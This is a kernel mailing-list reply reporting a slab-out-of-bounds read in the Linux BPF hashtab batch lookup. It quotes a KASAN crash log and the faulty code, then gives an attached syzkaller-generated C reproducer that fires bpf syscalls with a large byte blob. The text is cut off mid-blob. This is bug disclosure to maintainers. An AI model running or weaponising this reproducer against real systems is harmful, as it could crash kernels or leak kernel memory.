Re: A slab-out-of-bounds Read bug in __htab_map_lookup_and_delete_batch
From: butt3rflyh4ck
Date: Wed Dec 29 2021 - 22:24:19 EST
Hi, the attachment is a reproducer. Enjoy it.
Regards,
butt3rflyh4ck.
On Thu, Dec 30, 2021 at 10:23 AM Alexei Starovoitov
<alexei.starovoitov@xxxxxxxxx> wrote:
>
> On Wed, Dec 29, 2021 at 2:10 AM butt3rflyh4ck
> <butterflyhuangxx@xxxxxxxxx> wrote:
> >
> > Hi, there is a slab-out-bounds Read bug in
> > __htab_map_lookup_and_delete_batch in kernel/bpf/hashtab.c
> > and I reproduce it in linux-5.16.rc7(upstream) and latest linux-5.15.11.
> >
> > #carsh log
> > [ 166.945208][ T6897]
> > ==================================================================
> > [ 166.947075][ T6897] BUG: KASAN: slab-out-of-bounds in _copy_to_user+0x87/0xb0
> > [ 166.948612][ T6897] Read of size 49 at addr ffff88801913f800 by
> > task __htab_map_look/6897
> > [ 166.950406][ T6897]
> > [ 166.950890][ T6897] CPU: 1 PID: 6897 Comm: __htab_map_look Not
> > tainted 5.16.0-rc7+ #30
> > [ 166.952521][ T6897] Hardware name: QEMU Standard PC (i440FX + PIIX,
> > 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
> > [ 166.954562][ T6897] Call Trace:
> > [ 166.955268][ T6897] <TASK>
> > [ 166.955918][ T6897] dump_stack_lvl+0x57/0x7d
> > [ 166.956875][ T6897] print_address_description.constprop.0.cold+0x93/0x347
> > [ 166.958411][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.959356][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.960272][ T6897] kasan_report.cold+0x83/0xdf
> > [ 166.961196][ T6897] ? _copy_to_user+0x87/0xb0
> > [ 166.962053][ T6897] kasan_check_range+0x13b/0x190
> > [ 166.962978][ T6897] _copy_to_user+0x87/0xb0
> > [ 166.964340][ T6897] __htab_map_lookup_and_delete_batch+0xdc2/0x1590
> > [ 166.965619][ T6897] ? htab_lru_map_update_elem+0xe70/0xe70
> > [ 166.966732][ T6897] bpf_map_do_batch+0x1fa/0x460
> > [ 166.967619][ T6897] __sys_bpf+0x99a/0x3860
> > [ 166.968443][ T6897] ? bpf_link_get_from_fd+0xd0/0xd0
> > [ 166.969393][ T6897] ? rcu_read_lock_sched_held+0x9c/0xd0
> > [ 166.970425][ T6897] ? lock_acquire+0x1ab/0x520
> > [ 166.971284][ T6897] ? find_held_lock+0x2d/0x110
> > [ 166.972208][ T6897] ? rcu_read_lock_sched_held+0x9c/0xd0
> > [ 166.973139][ T6897] ? rcu_read_lock_bh_held+0xb0/0xb0
> > [ 166.974096][ T6897] __x64_sys_bpf+0x70/0xb0
> > [ 166.974903][ T6897] ? syscall_enter_from_user_mode+0x21/0x70
> > [ 166.976077][ T6897] do_syscall_64+0x35/0xb0
> > [ 166.976889][ T6897] entry_SYSCALL_64_after_hwframe+0x44/0xae
> > [ 166.978027][ T6897] RIP: 0033:0x450f0d
> >
> >
> > In hashtable, if the elements' keys have the same jhash() value, the
> > elements will be put into the same bucket.
> > By putting a lot of elements into a single bucket, the value of
> > bucket_size can be increased to overflow.
> > but also we can increase bucket_cnt to out of bound Read.
>
> Can you be more specific?
> If you can send a patch with a fix it would be even better.
>
> > the out of bound Read in __htab_map_lookup_and_delete_batch code:
> > ```
> > ...
> > if (bucket_cnt && (copy_to_user(ukeys + total * key_size, keys,
> > key_size * bucket_cnt) ||
> > copy_to_user(uvalues + total * value_size, values,
> > value_size * bucket_cnt))) {
> > ret = -EFAULT;
> > goto after_loop;
> > }
> > ...
> > ```
> >
> > Regards,
> > butt3rflyh4ck.
> >
> >
> > --
> > Active Defense Lab of Venustech
--
Active Defense Lab of Venustech
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>
static unsigned long long procid;
static void sleep_ms(uint64_t ms)
{
usleep(ms * 1000);
}
static uint64_t current_time_ms(void)
{
struct timespec ts;
if (clock_gettime(CLOCK_MONOTONIC, &ts))
exit(1);
return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}
static void thread_start(void* (*fn)(void*), void* arg)
{
pthread_t th;
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setstacksize(&attr, 128 << 10);
int i = 0;
for (; i < 100; i++) {
if (pthread_create(&th, &attr, fn, arg) == 0) {
pthread_attr_destroy(&attr);
return;
}
if (errno == EAGAIN) {
usleep(50);
continue;
}
break;
}
exit(1);
}
typedef struct {
int state;
} event_t;
static void event_init(event_t* ev)
{
ev->state = 0;
}
static void event_reset(event_t* ev)
{
ev->state = 0;
}
static void event_set(event_t* ev)
{
if (ev->state)
exit(1);
__atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000);
}
static void event_wait(event_t* ev)
{
while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
}
static int event_isset(event_t* ev)
{
return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}
static int event_timedwait(event_t* ev, uint64_t timeout)
{
uint64_t start = current_time_ms();
uint64_t now = start;
for (;;) {
uint64_t remain = timeout - (now - start);
struct timespec ts;
ts.tv_sec = remain / 1000;
ts.tv_nsec = (remain % 1000) * 1000 * 1000;
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
return 1;
now = current_time_ms();
if (now - start > timeout)
return 0;
}
}
static bool write_file(const char* file, const char* what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
static void kill_and_wait(int pid, int* status)
{
kill(-pid, SIGKILL);
kill(pid, SIGKILL);
for (int i = 0; i < 100; i++) {
if (waitpid(-1, status, WNOHANG | __WALL) == pid)
return;
usleep(1000);
}
DIR* dir = opendir("/sys/fs/fuse/connections");
if (dir) {
for (;;) {
struct dirent* ent = readdir(dir);
if (!ent)
break;
if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
continue;
char abort[300];
snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name);
int fd = open(abort, O_WRONLY);
if (fd == -1) {
continue;
}
if (write(fd, abort, 1) < 0) {
}
close(fd);
}
closedir(dir);
} else {
}
while (waitpid(-1, status, __WALL) != pid) {
}
}
static void setup_test()
{
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
write_file("/proc/self/oom_score_adj", "1000");
}
struct thread_t {
int created, call;
event_t ready, done;
};
static struct thread_t threads[16];
static void execute_call(int call);
static int running;
static void* thr(void* arg)
{
struct thread_t* th = (struct thread_t*)arg;
for (;;) {
event_wait(&th->ready);
event_reset(&th->ready);
execute_call(th->call);
__atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
event_set(&th->done);
}
return 0;
}
static void execute_one(void)
{
int i, call, thread;
for (call = 0; call < 5; call++) {
for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) {
struct thread_t* th = &threads[thread];
if (!th->created) {
th->created = 1;
event_init(&th->ready);
event_init(&th->done);
event_set(&th->done);
thread_start(thr, th);
}
if (!event_isset(&th->done))
continue;
event_reset(&th->done);
th->call = call;
__atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
event_set(&th->ready);
event_timedwait(&th->done, 50);
break;
}
}
for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
sleep_ms(1);
}
static void execute_one(void);
#define WAIT_FLAGS __WALL
static void loop(void)
{
int iter = 0;
for (;; iter++) {
int pid = fork();
if (pid < 0)
exit(1);
if (pid == 0) {
setup_test();
execute_one();
exit(0);
}
int status = 0;
uint64_t start = current_time_ms();
for (;;) {
if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
break;
sleep_ms(1);
if (current_time_ms() - start < 5000)
continue;
kill_and_wait(pid, &status);
break;
}
}
}
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
uint64_t r[1] = {0xffffffffffffffff};
void execute_call(int call)
{
intptr_t res = 0;
switch (call) {
case 0:
*(uint32_t*)0x20000380 = 0xa;
*(uint32_t*)0x20000384 = 7;
*(uint32_t*)0x20000388 = 0x309;
*(uint32_t*)0x2000038c = 0xf3;
*(uint32_t*)0x20000390 = 0;
*(uint32_t*)0x20000394 = 1;
*(uint32_t*)0x20000398 = 0;
memset((void*)0x2000039c, 0, 16);
*(uint32_t*)0x200003ac = 0;
*(uint32_t*)0x200003b0 = -1;
*(uint32_t*)0x200003b4 = 0;
*(uint32_t*)0x200003b8 = 0;
*(uint32_t*)0x200003bc = 0;
*(uint64_t*)0x200003c0 = 0;
res = syscall(__NR_bpf, 0ul, 0x20000380ul, 0x48ul);
if (res != -1)
r[0] = res;
break;
case 1:
syscall(__NR_bpf, 1ul, 0ul, 0ul);
break;
case 2:
*(uint32_t*)0x20000180 = -1;
*(uint64_t*)0x20000188 = 0x20000a00;
memcpy((void*)0x20000a00, "\xc9\xd6\x4f\x6b\x1f\x2e\xb1\x39\xc7\x52\xfa\xf4\x4e\x11\x00\x46\x21\xd4\x84\x03\x1b\x9e\x2c\xa1\x19\x0c\x7a\x37\xbc\xa1\xbc\x08\x8e\x36\x9b\x8b\xa1\xfc\x50\x16\xcf\x0f\x78\xdb\x15\x08\xed\x4e\x69\x10\xd1\x78\x0b\x9c\x5f\xa0\x1d\x69\xe7\x47\xc1\x09\x35\xf3\x3b\xcc\x35\x5f\xeb\x2d\x32\x8c\x7a\xd6\xbe\x61\x9b\xd9\xcd\xe6\x55\x09\xda\x74\xdc\x74\xe9\xde\x1a\x99\x7e\x45\x86\x3d\xd7\xcf\x81\x48\x2c\x8e\x38\x08\xc6\xff\x35\x44\xe9\xfa\xd6\x25\x4b\x1c\x46\x37\x46\x4a\x02\xa8\xfc\x10\x1d\x66\x64\xae\x2b\xca\x0b\x38\x05\x16\x36\x7f\xd3\x3d\xee\xba\x57\x30\x4f\xfa\xaf\x56\x55\x4e\x30\x5b\xe7\xbb\x3d\x40\xa5\x7e\x12\x2e\x8f\xf5\x96\x96\x8c\x2c\x39\x9d\x88\x2c\x6e\x69\x19\xcb\xd8\x3d\x13\xfe\x86\xf8\x56\x6e\xce\x5e\x76\x63\x64\x62\xac\x16\xa6\xd7\x60\x65\x62\x0d\x47\x65\x86\x39\x6c\x62\xaf\x97\x0b\xf6\x09\x5b\x07\x4f\x66\xf2\x6f\x33\xb1\x2e\x85\x2d\x4d\xa4\x7f\x6c\x8c\x9c\x81\x0c\xbe\x18\x8c\x2a\xdc\x87\x25\x6c\x8f\x18\xff\x81\x2d\x95\xdd\x87\x45\xfa\x96\xd2\x5c\x59\x93\xda\x80\x76\x4e\x99\xdf\xea\x3d\xc2\x42\x9b\x44\x29\xdf\xaf\x84\x6f\xe8\x39\x56\x6c\x99\x53\x68\xaf\x19\x83\xde\x72\x90\xb4\xd6\x96\x6c\xcc\xfc\x39\x53\x69\x58\xae\x31\x89\x45\xf4\x71\x13\xb4\x8e\x8d\xef\xea\x6c\x77\x28\xf9\x81\x71\x8c\x41\x14\xff\x30\x1f\x27\x41\xc9\xf2\xac\x61\x83\x31\xc9\x9a\xf3\xa1\xd6\x54\x9c\x84\xcd\xf0\x6b\x1d\xc9\x19\xd3\x28\x69\x76\xc2\x66\x68\x18\xa4\xad\x10\xbe\x22\x4f\x6b\xc9\xa1\x3a\x2b\xe9\xa1\xee\x20\x52\x79\x4a\xc7\x90\x6a\xb7\xda\x64\x2f\x4b\xc0\x4f\x99\x6c\xf9\x80\x14\x0b\x3c\x0f\xd0\x08\xcd\x35\x16\xf4\x5d\xa8\x9c\x4b\xbe\xb5\xd9\xaa\x90\x2b\x71\xe2\x14\xd0\xb0\x42\x71\x50\x09\x60\x9d\xa9\x38\x2d\xd7\xa5\x44\xe3\xcf\x51\x81\xae\xd2\x02\x54\x04\xcc\xed\x28\xb0\x44\x76\xc3\x7f\xe2\xe6\x5d\xd1\x49\x2d\x64\x44\xf9\xd4\x94\xdf\x08\x20\x72\x0d\xb2\x41\x1e\xe2\x6a\x02\xcf\x35\xbf\x7f\x81\xe3\xc3\xf4\x67\xf3\x0c\x10\x14\x75\x99\x0a\xc2\xba\xda\x18\x80\x77\xfc\xa7\x9e\x24\xba\x10\x15\x77\x5c\xe3\xcc\x48\xe0\xed\x27\xdc\x32\xab\x62\x45\x0f\xc6\x7e\xeb\x0b\xac\xe8\x48\x87\x33\x13\x3c\x1f\x01\x1a\xf5\x1f\xc8\x11\x00\x7b\xaa\x73\x8a\x92\x9b\x4e\xdd\x54\x94\x59\x88\x69\x5f\xaa\x4d\x8d\x1b\x8b\xe3\x85\x69\xcd\x2a\x3a\x73\x76\xd9\x15\x58\x04\x56\xa5\x6b\x84\x13\x68\x5f\xbb\x64\x0e\x21\xd5\x0c\xbf\x91\x83\x75\x82\x2a\x82\xc5\x63\xa3\xc6\xaa\xf8\xe8\xdd\x61\xe1\x1e\x7c\x5d\xea\xce\xa2\x73\x9c\x5a\x6f\xca\x06\xf3\xa0\xdf\xe5\x90\x6c\xfb\xb9\xad\x5e\x1e\xc9\xdd\xcc\xcb\xe7\xd8\xf6\xc2\x8f\x27\xbc\x46\x4f\x2a\x8a\x88\x2f\x3e\x67\x0f\xcd\x3e\x70\x5b\x17\xbe\xc3\x96\x89\x3d\xe9\xe8\x0f\xf5\xd6\x7d\x66\x66\xbc\x0c\xd0\xe6\xdf\x67\x08\x62\x0c\xa1\xfa\x2f\x1c\xa0\xad\x38\x5f\xe6\xd7\xdd\xad\xf2\x0a\x65\x95\xeb\xb4\xcf\x86\x51\xb6\x2c\x8a\x12\x00\x7d\xb8\xf7\x03\x7b\x86\xfd\x9c\x69\xdf\x97\x19\x04\xd7\xd0\x5d\xa5\x0f\xe2\x49\xac\xd0\x3a\x5a\xd5\xc8\x9c\x8c\xb9\x5f\xa1\x99\x7c\x64\xa3\x57\x87\x04\x33\xc6\x41\x00\x23\x18\x10\xe7\x71\x43\xf7\x2a\x18\xb9\x90\x4e\xec\x7b\xf6\xc5\xcb\xe5\x6c\xf1\x78\x11\x73\x75\xc2\xa0\x63\x16\xfa\xbf\xf0\x4e\x00\x4b\x3a\x96\x58\x7c\xea\x60\x10\x27\xb3\x38\x1a\x79\x3c\xd5\xe2\x19\x73\x51\xe0\x58\x3e\x56\x74\x82\xa2\x38\x14\x81\x24\xbb\x3f\xab\x89\x1b\xe6\xce\x5c\xdc\x0f\x87\x74\x01\xe2\x59\xf0\x11\xb1\x42\xb6\x41\x70\x2e\x41\xbf\x10\xaf\x9b\x63\xf1\x6a\xbf\xd5\x30\xd9\xd1\x7f\x6c\xe3\x71\x60\x54\xbc\x98\xdb\xb7\xc5\x97\xe5\xe9\xb2\xb3\xa0\x41\x98\x5b\x12\x8f\x34\x9a\xb7\xad\xa2\xea\xc8\x32\x39\x11\xe7\x5f\x8f\x77\xfc\x04\xa3\xe4\x64\x74\xd0\xf5\xee\x4a\x4b\x7d\x42\x3a\xbf\xd0\xce\x2e\x3d\x55\xf1\x88\xfe\x79\x61\x3b\xb4\x20\x2f\x62\x5b\xe3\x8f\x6b\x5f\xd3\x08\xfc\x19\xe3\x15\xfe\x7c\x9a\x3b\xaa\xaf\x80\x17\x72\xc7\x13\x82\xde\x59\x23\xaa\x65\x0a\x55\x50\x29\x83\xf8\xe0\x60\xd8\x95\xa3\x20\xa1\x2b\x4e\x43\xe2\x76\x2a\x0c\x47\x5b\x0f\x77\x8c\xfd\x06\x6c\x3f\x50\x53\x53\x41\x22\x49\x53\x2b\xd4\xa5\x21\x6e\xc5\xe1\xee\x15\x40\x16\xef\x55\x3b\x54\x43\x99\xff\xe0\x3a\xcb\xeb\x9a\xf1\x8d\xd4\x20\x8f\x2d\xf7\x70\x39\x06\xc9\xc7\x25\xf3\xf1\xf3\xfe\xb4\xdb\x4d\x3d\x32\xe8\x19\xb4\xa7\x5a\xec\x88\xc1\x55\xdb\x0c\xa1\x55\xa0\x55\xf6\x56\x4e\x05\x48\xc1\xb5\xe6\x13\xa9\xc3\xb3\xa4\xf7\x1e\x26\xa5\x8f\x1e\x65\xa9\xfd\x98\x32\x12\x7b\xb8\x05\x08\xa1\xec\x1a\x59\xdc\xf3\x33\xc6\xb5\x0f\x9f\xa1\xe7\xe6\x32\xe9\x16\x04\xc4\x60\x1d\x96\xce\x28\xec\x3f\x46\x12\x57\xa9\xc0\x61\xda\xd3\xd5\xa6\xa9\xaa\x4d\x80\x43\xb6\x59\x1b\x72\x55\x3d\x09\xeb\x36\xd2\xd7\x77\xf5\x39\x7d\xf8\xe9\xbc\x37\x89\xe0\xbc\xa5\xed\x73\x18\x94\x14\xf9\xb0\x08\x17\x47\x1e\x3b\x1c\xe3\x3e\xe0\xb5\x27\xe8\x34\x53\x07\x07\x27\xa0\x77\x77\xaf\x17\x6f\xf7\x10\x1e\xd3\x43\xdf\xa4\x05\xac\x99\x6a\x1d\x5b\x4a\xc9\x38\x77\xf1\xcc\xa3\x9b\xaf\x2a\xfa\x44\xbb\x60\x39\x35\xd7\xe4\xe7\x71\x5c\xd5\x47\x23\x1f\x52\xa6\xfa\x3b\x32\xf6\x99\x9d\x4a\xd8\xe5\x81\x20\xcd\xa3\x4d\xe8\xb7\x32\x48\x00\x56\xca\x2f\x7b\x08\x40\x7b\x11\xf5\x54\x37\x83\x56\x10\x9c\xb4\x56\xc8\x24\xeb\x1c\xd0\x49\x0b\x1c\x3a\x2c\x38\xe4\xd9\x7b\xe7\x1a\xf5\x4b\xf9\x4e\x10\x2d\x7d\x50\xe4\x2e\xc6\x97\x6b\x01\x5d\x96\x69\x77\xb5\xd3\xaa\xe6\x63\x51\x86\xf5\xea\x03\x40\x20\xe5\x31\xd0\x87\x00\x93\xed\x2d\xd0\x7b\xfa\x75\x92\xcf\xf0\x92\x55\x4c\xf6\xee\x56\x40\x90\xdb\x28\xa7\x57\x82\x81\x69\x4f\x82\x00\xb8\xb8\x62\x99\xa7\x5f\x1c\x83\x8e\x37\x2b\x7d\x60\x7b\x0b\xb9\xdf\xe2\xde\xe3\xb6\x12\xdb\xd0\x3e\x79\xd3\xb9\x7e\x8c\xb0\x2b\x59\x67\x26\xa5\x1a\xad\x74\xe9\x39\x1c\xd5\x47\x8e\xda\xc5\x53\x05\xf8\xd7\x60\x43\x25\xb6\x27\xa5\xb9\x41\x97\x21\xbb\xc0\xf6\x05\x56\xbc\x32\x6d\x14\x2e\x57\xeb\x82\x0d\x6d\xcf\x71\x24\xdd\x08\x10\x6f\x6f\xa3\x59\xf8\x7b\xd0\x8d\x8c\xe6\xf4\x51\xee\x5e\x8b\xc9\xc1\x74\x31\x65\x63\x9c\xf5\xd3\x71\x50\x3a\xd5\x63\x03\xb0\xff\xec\xb0\xf9\xc8\xe8\x21\xcf\x16\xfa\x20\x14\x33\xed\x59\x7b\xcd\xf6\xae\xba\xa3\x36\xc6\xfc\x7c\x6c\x2f\x97\xdd\xb5\x1b\xb4\xf5\xcd\xb3\x9c\xad\x09\x42\xbe\xfa\xd7\xc0\x93\x3f\x55\x4e\xc2\x2a\x34\x54\xf7\x7a\xd0\x4a\x53\x07\xb5\x34\x47\x46\xa9\x45\x04\xfa\xaf\x93\xf0\xd8\x35\x6a\x5c\x40\xd2\x79\xbd\x16\xe0\x6a\xe3\x94\x1e\x15\x73\x1a\x49\xaa\x47\xd0\x5b\x5b\x9b\x40\xbc\x0a\x52\x7a\xc9\x54\xf5\x67\xf4\x42\x7c\xcd\x7e\x69\x70\x46\xec\x19\xcf\x5d\x7c\xfa\x93\x2d\xcd\x91\xc9\x5c\xdc\x46\x14\x86\x39\x01\x46\x09\x65\x2b\x21\x34\x18\x7c\x14\x5e\x71\xa0\x9e\x16\x4c\xa1\xcc\xd9\xf4\xf5\xc3\x7f\xe1\x2e\x7b\xe9\x79\xcb\xd5\x94\x23\x28\x21\x27\x7e\x43\x88\xbc\xa0\x33\x72\xe4\x72\x7f\xc0\xfa\x7b\xeb\xf3\xab\xcd\x79\xd4\x44\xe7\xfb\x60\x6c\x70\x43\xf3\x84\x56\x78\x50\x4d\x58\x1a\xa4\xcf\x88\xc2\x26\x6c\x04\xee\xfc\x36\x34\xb1\xdb\xc6\x4e\xb2\x6c\xe5\x7a\x57\x7c\x9c\x10\x90\x9d\x6a\x7d\x76\xdd\x18\x00\x80\xe6\x11\x0b\x4c\x7d\x91\x12\x2b\xd3\x79\x6f\xbd\x10\x1b\x8c\x27\x75\xac\xfb\xe4\x95\x29\x6a\x7f\x1a\xbb\x07\xfe\xfe\x2c\xb0\xa8\xa7\x1b\x7b\x67\x60\x55\xf0\x08\x1e\x62\xc2\xa3\x4a\xc2\x57\x95\x70\x5b\xa3\xbc\xf7\x76\xbf\xa4\x6e\x95\x76\xa4\xb2\x96\x40\x4b\xeb\xc3\x8e\x6d\x99\xd4\xf3\x62\x69\x14\xd6\x9e\xd7\xeb\x7e\xae\x6f\x42\x9a\x7c\x5a\x53\x0e\xd0\x71\x9b\x56\x9d\x6d\xfe\x47\x17\x92\xd8\x2f\xf8\x32\x87\x5b\xbc\x3b\x6e\xe6\x21\xbc\xb3\x11\x1e\x8b\x00\xf6\x09\xae\x3b\xe4\xd7\x25\x57\x80\xfe\xc6\x2e\x5d\x56\x8d\x64\xe6\xed\x45\xf7\xfa\x55\xa0\x56\xa1\xf6\x40\x2a\x5e\xb0\xc6\x52\x3c\x3c\x66\x9b\x1f\x24\x64\xac\x78\xe3\xb2\x6d\xa8\x55\xdf\x15\x4d\x9b\x34\x16\x44\x93\x78\x5c\x86\x8f\xcb\x75\x85\x6e\x6b\x9d\x46\x0e\xd1\x4b\xe1\xc7\xb0\x3a\xcb\xa3\x6a\xf0\xc4\x10\xc5\x0c\x8b\xfd\x69\xa8\x21\x5e\xa5\x50\x7b\x3d\x1d\x6d\x20\xcc\x54\xb5\x3a\xf1\x17\xa1\xaa\x0a\xeb\xc2\x58\x11\x55\x6b\x61\xa1\x23\xbb\xa8\x38\x82\x56\x56\x74\x83\x14\x6a\x87\x48\xd8\x4d\xeb\x07\xd1\xa0\x04\xbd\x9c\xfe\xd3\xdf\x8e\x8b\x81\xa8\xca\x1d\x8f\x43\x48\x0d\x21\xae\xfe\x1e\x79\xdf\x20\x6a\x36\x2e\x3f\xb2\xa7\xe0\x03\x94\x9a\x83\xa8\x0e\x72\xa6\xde\x32\x4e\x9f\xef\xfe\x43\x3a\x50\x7d\x3a\x5d\x69\xe2\xe9\x0c\xca\xe6\x60\x65\x25\xd2\xcb\x55\x1b\x05\xb5\x84\x35\x9c\x7e\xe3\xe4\xb5\xc8\x9c\x21\x22\x9a\xba\x27\x82\x49\x76\x39\x0e\xe1\x5f\x2e\x8b\x7c\xfb\x6f\xc9\xad\x60\x1a\x1b\x79\xf0\xa6\x42\xc3\xd4\x8d\xf2\xde\xaf\x47\x5b\x22\x08\x67\xbd\x6a\x0a\xe6\x39\x03\x21\x5f\xfa\xe1\x66\x2e\x72\x79\x7d\xf6\x74\x25\xcb\xa4\xd8\x95\x92\x9f\x72\x96\x21\xa9\x64\x0b\xe7\x73\x22\xc6\x1f\xa8\x5c\xf8\x0b\x13\xb1\xfb\xcc\xbc\xdc\x17\xfa\xc3\x2b\xe3\x69\xb2\x26\x92\x33\x56\x71\x55\xec\x0e\xdd\xfa\x5e\xcf\x94\xfa\x36\x3d\x5c\xb3\x63\xb9\xfb\x3a\x0d\xe6\xc1\xa0\xcf\xb0\x5f\xa1\xa2\xe9\x4b\x8c\xd9\x21\xa2\x8b\x8a\x7b\x09\x75\x47\xa1\x07\xa3\x4e\xa3\xc5\x9e\xde\x91\xa5\xae\x37\x88\x06\x38\x2b\x0f\xb7\xd2\xcd\xc4\x04\xbc\x9f\x62\x5b\xce\xb8\xe7\xc2\x16\x34\x48\xf7\xb6\xbf\x95\x0a\x1b\x50\xd8\xdb\x27\x6f\xd2\x65\xf4\xce\xf1\x4c\x71\x95\x5e\x9c\x6b\xfb\xbd\x15\xb0\x91\xae\x03\x6e\x20\x20\x4d\xb4\x62\x2e\x3d\x9d\xea\x2b\x2f\x57\x5a\x9d\xbf\xe0\x0f\x24\x77\x89\x0a\x28\xca\xf3\x0e\x03\x48\x8c\x5d\xad\x83\x3a\x64\x80\x36\x07\x7e\xf6\x28\xcf\x6d\x21\xca\x26\xfa\x6d\x68\xd3\x87\x21\x4c\xdd\xa6\xce\xac\xd5\x6e\x62\x42\x37\xad\xbe\x3f\x76\x9a\xdd\xde\x2c\x22\x88\x24\x99\xb5\x17\x96\x91\x8e\xea\xd3\x8f\x7f\x35\x7e\xff\xe6\x86\xc9\xab\x4b\xdd\xa4\x68\x95\xfb\xef\xaf\xbe\x6b\x66\x99\x0b\x02\xd1\x15\x3d\x43\x4b\x03\xfa\x3c\x6f\xd0\xcf\x03\x4b\x53\x94\x75\x65\x53\xbe\x29\x5d\xf8\x0e\x17\xd6\x1a\x94\xf9\x5e\xd5\x7a\xbb\xad\xf6\xf8\x55\x43\xbc\x58\x78\x3e\xd5\x67\x8b\x30\x19\x3d\xdf\x4c\xca\x8d\x82\xb7\x63\x92\x0c\x08\xc8\xdb\x88\x31\xc5\xb7\x5d\x14\x8f\xa6\x09\xf5\x49\x41\x6b\xbc\x4c\x3d\xf8\x4c\xef\x4d\x44\x0d\xcd\x4f\xba\x57\x68\x38\x55\xfe\x54\x78\xff\xa8\x92\x29\xfd\xa6\x87\xfa\xc0\x43\x5f\x3f\x9b\x99\x94\x75\x3e\xaa\xb6\xdf\x32\x7a\xeb\xf6\x5e\x8f\x6b\xdc\x94\xdf\x93\x9c\x11\xfc\xfd\xc9\xc8\x1a\xa5\x13\x40\x58\x9b\xf8\x17\x98\x89\x68\x70\x84\x5d\x52\xde\xba\x6e\xc7\xc8\xbb\x8e\x95\x17\x27\x44\x0a\x1c\x8c\x81\x87\xd9\xf2\x14\xc8\x82\x4c\xe0\x26\x16\x1c\x6e\x0b\x67\x2e\x1e\x00\x43\xf6\xed\xd8\xb6\xce\x99\x48\x1f\xae\x85\xed\x9a\x21\xe0\x32\x2c\x87\x70\x43\x89\x41\x65\xfa\x7d\x79\xd7\xf0\x9f\x72\x4e\xa8\x29\x00\x14\x92\xc5\x33\x20\x91\x5b\x0e\x8c\x8e\x2f\x5a\xce\x34\xfd\x42\x30\xe9\xd8\xea\x8a\x0f\xfb\xaa\x47\x48\x3a\xe1\x9b\xc8\x21\x5c\x03\x27\x40\x99\x3e\x5b\xab\x79\x17\xd7\x8d\x57\x2c\xfe\x04\x00\xa9\xcb\xb6\x13\xd3\xa8\x47\xa3\xcf\xb2\x53\x06\xea\x41\x19\x75\x78\xf4\x70\x91\xeb\xf2\xf9\x7f\xaa\x21\x4c\x3e\xa9\xbc\x76\x5e\x72\x1e\xa5\x89\xc3\x1d\xe1\xe3\x2b\x36\x99\xae\xe2\x0a\x17\x3a\x90\xdb\xad\x1d\xdf\xdd\x7b\x12\xf9\xfc\xe9\xd4\xa6\x52\x4b\xc1\xac\xf9\x19\xfe\xb2\xd2\x5b\xb9\x68\xe2\xf6\x02\x21\x6b\xf9\x20\xe8\x1d\x99\xe8\xa4\x91\x9d\x8d\xc4\xb3\xfa\x63\x57\xd5\x87\x48\x2e\x2c\x49\x9c\xbd\x96\xab\xcf\x7b\x4a\xed\x25\x74\x37\x01\x93\x39\x26\x6c\x56\x64\x08\xa4\xa7\x81\x08\x97\x05\xca\x5e\x3b\x2b\x86\xff\xa7\x5a\x5b\x28\xb8\xab\xd9\x57\xc8\xf4\x66\xaf\xef\x5a\x4d\xfb\x84\x96\x44\xa9\xd5\x12\xf6\x59\xfd\x6b\xbb\x9a\xae\x92\x1e\x28\xc3\x03\xc9\x75\x56\xb7\xf7\xf5\x69\xbd\x2f\x6b\xd3\x65\xcb\x36\x6a\x0d\xd7\x5c\x2f\x8b\x63\x0f\x13\x0a\x7d\xc2\xc6\xe2\xd4\x7e\x7d\x64\x05\x22\x4e\x57\xd9\x95\xa4\x6c\xef\xa5\x36\xe9\x26\xd2\x9f\x58\xf9\x4d\xbc\x93\xad\x20\xe7\x55\x31\xe4\xb3\x44\x51\xec\x6e\xed\xa2\xf2\xf7\x50\xdd\x7d\xdb\xa0\xef\x2d\xd0\x68\x3d\xed\xff\x89\x7b\x38\x13\x69\xcb\x68\x96\xef\x43\xca\x05\xbe\x47\x2f\x57\x97\xf3\xdc\x1a\x8c\x89\x3b\x4e\x16\x61\x55\xc9\xf7\x0e\xad\x13\x42\x70\x80\x2b\x82\x08\x50\xe9\x5b\x84\xe0\x6a\xe8\xe3\x9a\xbe\x96\x8c\x58\x5b\xcc\x07\xcc\x6d\x2a\xe5\x77\x69\x4c\xcd\xd4\x60\xdc\x37\x81\x5c\x58\x7e\x09\x14\xc6\xd1\x6b\x